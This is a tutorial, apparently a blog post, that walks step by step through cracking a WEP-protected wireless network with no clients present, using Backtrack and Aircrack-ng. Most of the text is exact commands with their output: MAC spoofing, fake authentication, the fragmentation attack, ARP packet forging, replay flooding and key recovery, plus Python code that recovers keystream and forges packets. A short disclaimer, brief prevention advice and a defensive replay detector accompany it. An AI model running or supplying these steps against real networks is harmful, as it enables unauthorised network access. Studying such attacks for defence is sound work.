Most of the techniques that attackers can use to break into WEP wireless networks are based on sniffing traffic from clients. The information found is then used to amplify traffic to and from those clients, so that enough packets with weak Initialization Vectors (IVs) can be collected for the WEP key to be recovered using statistical techniques.
Often clients may not be on the network at the time the attacker is trying to penetrate it, but penetration is still possible, even without active clients.
Here we look at the "Clientless WEP attack", which uses techniques to construct portions of the PRGA keystream, so that packets (of the attacker's choice) can be injected into the network, and broadcast responses (with weak IVs) can be collected.
We are going to be using Backtrack 4 and the Aircrack-ng suite of command-line tools.
Please be good, and only try these techniques on your own test equipment. There is such a thing as the law you know, and breaking into someone else's Wireless router is against the law.
As we are posing as a sneaky attacker, we will change our MAC address before we bring the card up in monitor mode.
modprobe rt73
macchanger -r rausb0
macchanger -s rausb0 >> info.txt
airmon-ng start rausb0 7
First we have a quick look at our target WAP.
airodump-ng --encrypt wep -w macchangeclientless2 --channel 7 rausb0
CH 7 ][ Elapsed: 0 s ][ 2010-07-21 13:04
BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
00:90:D0:2A:0C:7F  105 100       26        0    7   7  54e  WEP  WEP         SlowNet
BSSID STATION PWR Rate Lost Packets Probes
We now have all the details we need for the attack:
- Our attacking MAC address = 32:32:fe:16:ea:29
- The victim WAP ESSID = SlowNet
- The victim WAP BSSID = 00:90:D0:2A:0C:7F
- The WAP is on channel 7
aireplay-ng -1 0 -e SlowNet -a 00:90:D0:2A:0C:7F -h 32:32:fe:16:ea:29 rausb0
CH 7 ][ Elapsed: 20 s ][ 2010-07-21 13:04
BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
00:90:D0:2A:0C:7F  105 100       46       15    7   7  54e  WEP  WEP         SlowNet
BSSID              STATION            PWR   Rate   Lost  Packets  Probes
00:90:D0:2A:0C:7F  32:32:FE:16:EA:29   -1   1 - 0     0        1
That's our wireless card "fake authenticated" to the WAP. Next we need to test injection using aireplay-ng.
aireplay-ng -9 -b 00:90:D0:2A:0C:7F -h 32:32:fe:16:ea:29 rausb0
13:06:31 Trying broadcast probe requests...
13:06:32 No Answer...
13:06:32 Found 1 AP
13:06:32 Trying directed probe requests...
13:06:32 00:90:D0:2A:0C:7F - channel: 7 - 'SlowNet'
13:06:38 0/30: 0%
The card I am using here is not great, so I practically need to be in the same room, let's get closer...
aireplay-ng -9 -b 00:90:D0:2A:0C:7F -h 32:32:fe:16:ea:29 rausb0
13:06:59 Trying broadcast probe requests...
13:06:59 Injection is working!
13:07:01 Found 1 AP
13:07:01 Trying directed probe requests...
13:07:01 00:90:D0:2A:0C:7F - channel: 7 - 'SlowNet'
13:07:01 Ping (min/avg/max): 0.059ms/9.589ms/114.156ms Power: 108.59
13:07:01 29/30: 96%
That's better, and this is something to watch out for: you need to be close to the WAP for the fragmentation attack to work, because a good percentage of your transmissions must actually be received by the WAP.
So now we can start a fragmentation attack to get some keystream data.
aireplay-ng -5 -b 00:90:D0:2A:0C:7F -h 32:32:fe:16:ea:29 rausb0
13:08:37 Waiting for beacon frame (BSSID: 00:90:D0:2A:0C:7F) on channel 7
13:08:37 Waiting for a data packet...
Read 276 packets...
Size: 68, FromDS: 1, ToDS: 0 (WEP)
BSSID = 00:90:D0:2A:0C:7F
Dest. MAC = FF:FF:FF:FF:FF:FF
Source MAC = 00:0E:50:EC:B2:A6
0x0000: 0862 0000 ffff ffff ffff 0090 d02a 0c7f .b...........*.
0x0010: 000e 50ec b2a6 b0cd 8e68 6200 7cb2 7315 ..P......hb.|.s.
0x0020: 1d3a f884 9feb 9451 d96f 83c0 90fc fdf3 .:.....Q.o......
0x0030: bec5 a496 7b8a dc6c 74c1 17e6 8e56 9be1 ....{..lt....V..
0x0040: f966 d142 .f.B
Use this packet ? y
Saving chosen packet in replay_src-0721-130905.cap
13:09:08 Data packet found!
13:09:08 Sending fragmented packet
13:09:08 Got RELAYED packet!!
13:09:08 Trying to get 384 bytes of a keystream
13:09:08 Got RELAYED packet!!
13:09:08 Trying to get 1500 bytes of a keystream
13:09:09 Got RELAYED packet!!
Saving keystream in fragment-0721-130908.xor
This gives us 1500 bytes of keystream data, which we can XOR with our packets to encrypt them for the wireless network.
We will make a broadcast ARP packet from the keystream data obtained.
packetforge-ng -0 -a 00:90:D0:2A:0C:7F -h 32:32:fe:16:ea:29 -k 255.255.255.255 -l 255.255.255.255 -y fragment-0721-130908.xor -w arp-request3
Wrote packet to: arp-request3
Let's see what it looks like.
tcpdump -n -e -vvv -s0 -r arp-request3
reading from file arp-request3, link-type IEEE802_11 (802.11)
13:10:37.855810 WEP Encrypted 258us BSSID:00:90:d0:2a:0c:7f SA:32:32:fe:16:ea:29 DA:ff:ff:ff:ff:ff:ff Data IV:6268ad Pad 0 KeyID 0
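The property the fragmentation and packetforge-ng steps above rely on, as an added example that is not part of the original post: a toy WEP (plain RC4 keyed with IV || key, keyless CRC32 ICV) showing that XORing a frame with its known LLC/SNAP prefix yields the keystream for that IV, that two frames under the same IV cancel to plaintext XOR plaintext, and that a recovered keystream encrypts a chosen payload the receiver accepts. The key and IV are the article's values used only as constructed demo inputs (the IV bytes ad 68 62 are the ones tcpdump prints reversed above); the recovery and forge functions never touch WEP_KEY.

```python
import binascii
# Constructed demo values: the 40-bit key the article recovers, and the IV
# bytes of its replayed ARP frame (ad 68 62 on the wire).
WEP_KEY = bytes.fromhex("AABBCCDDEE")
IV = bytes.fromhex("ad6862")
ARP_SNAP = bytes.fromhex("aaaa030000000806")  # LLC/SNAP prefix of every ARP payload: known plaintext

def rc4_keystream(key: bytes, n: int) -> bytes:
    """Plain RC4: key scheduling, then n bytes of PRGA output."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out, i, j = bytearray(), 0, 0
    for _ in range(n):
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xFF])
    return bytes(out)

def icv(data: bytes) -> bytes:
    """WEP integrity check value: a keyless CRC32, so anyone can compute it."""
    return binascii.crc32(data).to_bytes(4, "little")

def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))

def wep_encrypt(key: bytes, iv: bytes, plaintext: bytes) -> bytes:
    """Frame body as sent: IV || RC4(iv || key) XOR (plaintext || ICV)."""
    body = plaintext + icv(plaintext)
    return iv + xor(body, rc4_keystream(iv + key, len(body)))

def wep_decrypt(key: bytes, frame: bytes):
    """Receiver side: strip IV, XOR with keystream, check ICV. None if the ICV fails."""
    iv, body = frame[:3], frame[3:]
    plain = xor(body, rc4_keystream(iv + key, len(body)))
    data = plain[:-4]
    return data if icv(data) == plain[-4:] else None

def recover_keystream(frame: bytes, known_plaintext: bytes) -> bytes:
    """Ciphertext XOR known plaintext yields that IV's keystream; no key needed."""
    return xor(frame[3:], known_plaintext)

def forge(iv: bytes, keystream: bytes, plaintext: bytes) -> bytes:
    """The packetforge-ng step: encrypt a chosen payload under a recovered keystream."""
    body = plaintext + icv(plaintext)
    return iv + xor(body, keystream)
```

The fragmentation attack only extends the eight keystream bytes the SNAP header gives to the full 1500; the forging itself is the last function.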
Now we will inject many copies of our constructed packet onto the network so that we can collect the responses.
aireplay-ng -2 -r arp-request3 rausb0
No source MAC (-h) specified. Using the device MAC (32:32:FE:16:EA:29)
Size: 68, FromDS: 0, ToDS: 1 (WEP)
BSSID = 00:90:D0:2A:0C:7F
Dest. MAC = FF:FF:FF:FF:FF:FF
Source MAC = 32:32:FE:16:EA:29
0x0000: 0841 0201 0090 d02a 0c7f 3232 fe16 ea29 .A.....*.22...)
0x0010: ffff ffff ffff 8001 ad68 6200 c337 dd5b .........hb..7.[
0x0020: 8eb8 18ef 6c25 f5ba 4601 80a0 decd a9fe ....l%..F.......
0x0030: c556 3a2d c853 3407 ad01 7288 e29e f251 .V:-.S4...r....Q
0x0040: 2beb e700 +...
Use this packet ? y
Saving chosen packet in replay_src-0721-131037.cap
You should also start airodump-ng to capture replies.
Looking at our dump screen we can see that the data packet count is now rising rapidly.
CH 7 ][ BAT: 1 hour 42 mins ][ Elapsed: 6 mins ][ 2010-07-21 13:12
BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
00:90:D0:2A:0C:7F  111  88     3744     5540  162   7  54e  WEP  WEP    OPN  SlowNet
BSSID              STATION            PWR   Rate   Lost  Packets  Probes
(not associated)   00:14:A5:2B:49:FF  102   0 - 1     0       11
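What this flood looks like from the defender's side, as an added example that is not part of the original post: a minimal 802.11 header parser and a detector that flags a (source, BSSID, IV) triple repeating far more than a WEP IV ever should. The sample capture is constructed from the header bytes of the injected ARP request shown above; the threshold is an assumption.

```python
from collections import Counter

# Constructed from the article's injected ARP request: the 24-byte 802.11 data
# header plus the 4-byte IV/KeyID field (the encrypted payload is not needed here).
REPLAYED_ARP = bytes.fromhex(
    "08410201" "0090d02a0c7f" "3232fe16ea29" "ffffffffffff" "8001" "ad686200"
)

def _mac(b: bytes) -> str:
    return ":".join(f"{x:02x}" for x in b)

def parse_wep_header(frame: bytes):
    """Return (src_mac, bssid, iv_hex) for a protected 802.11 data frame, else None."""
    if len(frame) < 28:
        return None
    fc0, fc1 = frame[0], frame[1]
    if (fc0 >> 2) & 0x3 != 2 or not fc1 & 0x40:   # type 2 = data, bit 6 = Protected
        return None
    to_ds, from_ds = fc1 & 0x1, (fc1 >> 1) & 0x1
    a1, a2, a3 = frame[4:10], frame[10:16], frame[16:22]
    if to_ds and not from_ds:          # station -> AP: addr1 = BSSID, addr2 = SA
        bssid, src = a1, a2
    elif from_ds and not to_ds:        # AP -> station: addr2 = BSSID, addr3 = SA
        bssid, src = a2, a3
    elif not to_ds and not from_ds:    # ad hoc / direct: addr3 = BSSID, addr2 = SA
        bssid, src = a3, a2
    else:
        return None                    # 4-address WDS frame; not handled here
    return _mac(src), _mac(bssid), frame[24:27].hex()

def find_iv_replay(frames, threshold: int = 20) -> dict:
    """Count (src, bssid, iv) triples; a WEP IV should never repeat, so any triple
    seen more than `threshold` times is a replay flood like the one above."""
    seen = Counter()
    for f in frames:
        parsed = parse_wep_header(f)
        if parsed:
            seen[parsed] += 1
    return {k: n for k, n in seen.items() if n > threshold}

def constructed_capture():
    """Three ordinary frames with fresh IVs followed by 500 verbatim replays."""
    fresh = [REPLAYED_ARP[:24] + bytes([0x10 + i, 0x11, 0x22, 0x00]) for i in range(3)]
    return fresh + [REPLAYED_ARP] * 500
```

The same parser handles the AP-side relayed frame from the fragmentation step (FromDS set), so both halves of the exchange can be counted.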
... so we can start aircrack-ng to crack the WEP key...
aircrack-ng macchangeclientless2-01.cap
Aircrack-ng 1.1 r1738
[00:00:30] Tested 9 keys (got 14851 IVs)
KB depth byte(vote)
0 0/ 1 AA(32512) 36(27648) 46(26880) 5C(26880) 6B(26624) BA(25856) 5F(24832) AB(24832) 39(24064)
1 2/ 4 08(27648) 65(26368) EF(26368) 3F(25856) 42(25088) C1(24832) 88(24064) DF(24064) EC(24064)
2 0/ 1 CC(30208) DD(28160) 4C(25856) 71(25344) 2A(25088) 37(25088) A3(25088) E6(24832) 73(24576)
3 1/ 2 DD(26624) B5(25344) 22(25088) CE(25088) E5(24576) 44(24320) 93(24320) 96(24320) 80(24064)
4 0/ 1 EE(27904) 6C(26112) 32(25344) 23(24832) 27(24576) 3F(24576) BE(24576) 1E(24320) 2D(24320)
KEY FOUND! [ AA:BB:CC:DD:EE ]
Decrypted correctly: 100%
... and in 30 seconds, the WEP key is ours...
And that's a wrap...
To prevent these issues:
- Always use WPA or WPA2 for secure networks
- Never use WEP except where you don't mind an access point being completely open
- Choose a strong and long password
Hi, I have one question. I have done access point mapping, so I have collected many APs with different encryption; some of them are open APs. Are there any tools or web services available for visualization? I found this website http://bit.ly/1Nbfgm6 but are there any other sources available?